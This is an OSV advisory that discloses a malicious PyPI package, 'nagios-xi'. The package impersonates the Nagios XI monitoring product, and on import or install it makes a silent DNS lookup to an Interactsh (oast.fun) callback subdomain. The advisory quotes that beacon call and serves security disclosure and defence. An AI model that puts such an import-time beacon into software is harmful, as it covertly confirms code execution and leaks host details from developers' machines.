OSV-MAL-2026-5698

Malicious code in nagios-xi (PyPI)

--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (c11c80cc2d314460d61a649c84fd75881388470382be8183b77b362e562a5c7f) On `import nagios_xi`, the package's `__init__.py` (lines 5-8) invokes `socket.gethostbyname("atlass-check.autaeqjhfowvnnmkwhxjtq8x39d8nder1.oast.fun")` inside a silent try/except. oast.fun is ProjectDiscovery's Interactsh out-of-band callback service; the DNS query itself is the exfiltration channel, confirming code execution on the installer's host and leaking the resolver IP to whoever controls the unique 32-character Interactsh subdomain. The package ships no actual functionality — it impersonates the Nagios XI commercial monitoring product (name `nagios-xi`, version `19.5.0` mimicking real Nagios XI versioning) while declaring an anonymous ProtonMail author (`Coding Team <pocbug@protonmail.com>`), a generic `package utility` description, and an empty README. The combination of brand impersonation, placeholder metadata, and an import-time OAST beacon as the package's sole behavior is reconnaissance for a supply-chain attack against developers searching for Nagios XI integrations. ## Source: kam193 (d8b27c2588accf4f2966f4630a12f9bfdc4ba621403f14237160632447152f23) Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities. Campaign: GENERIC-standard-pypi-install-pentest Reasons (based on the campaign): - The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk. - The package overrides the install command in setup.py to execute malicious code during installation.